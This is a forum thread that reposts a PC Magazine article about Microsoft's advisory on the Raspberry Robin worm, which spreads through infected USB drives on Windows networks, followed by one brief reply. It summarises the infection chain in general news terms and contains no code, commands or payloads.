Results 1 to 2 of 2

Thread: Hundreds of Windows Networks Are Infected With Raspberry Robin Worm

  1. #1
    #DeSantis2024 Teh One Who Knocks's Avatar
    Join Date
    Jan 2011
    Location
    5280' Above Sea Level
    Posts
    256,044
    vCash
    10966
    Mentioned
    20 Post(s)
    Thanks
    23,810
    Thanked 113,085 Times in 59,902 Posts

    Warning Hundreds of Windows Networks Are Infected With Raspberry Robin Worm

    By Matthew Humphries - PC Magazine




    Microsoft released a private threat intelligence advisory informing organizations that a worm called Raspberry Robin is infecting hundreds of Windows networks.

    As BleepingComputer reports(Opens in a new window), Raspberry Robin is being spread via infected USB devices. It requires a user to insert the USB device and click a malicious .LNK file. After that, the worm uses the Windows command prompt to launch an msiexec process and run a malicious file also present on the device.

    A connection is then established with a command and control server using a short URL, and if successfuly, a number of malicious DLLs are downloaded and installed. The legitimate Windows utility odbcconf.exe is then used to execute the DLLs while the worm repeatedly attempts to connect to Tor network nodes. At least some of the command and control servers being used are thought to be infected QNAP NAS devices.

    What's worrying is, whoever deployed Raspberry Robin so successfully has yet to take advantage of the infected Windows networks. The malware introduced by the worm is capable of bypassing Windows User Account Control (UAC) and has already proven it can use the utilities available to the OS. So while nobody currently knows the goal of Raspberry Robin, the control it imposes over a network means new malware could be downloaded and deployed very quickly.

    Microsoft has flagged Raspberry Robin as a high-risk campaign with good reason, and for now there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network. Intelligence analyst Red Canary produced a detailed report about the worm(Opens in a new window) back in May, which offers a deeper look into how it works.

  2. #2
    Shelter Dweller PorkChopSandwiches's Avatar
    Join Date
    Jan 2011
    Posts
    77,135
    vCash
    5000
    Mentioned
    15 Post(s)
    Thanks
    47,197
    Thanked 29,254 Times in 16,488 Posts
    Uh oh






Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •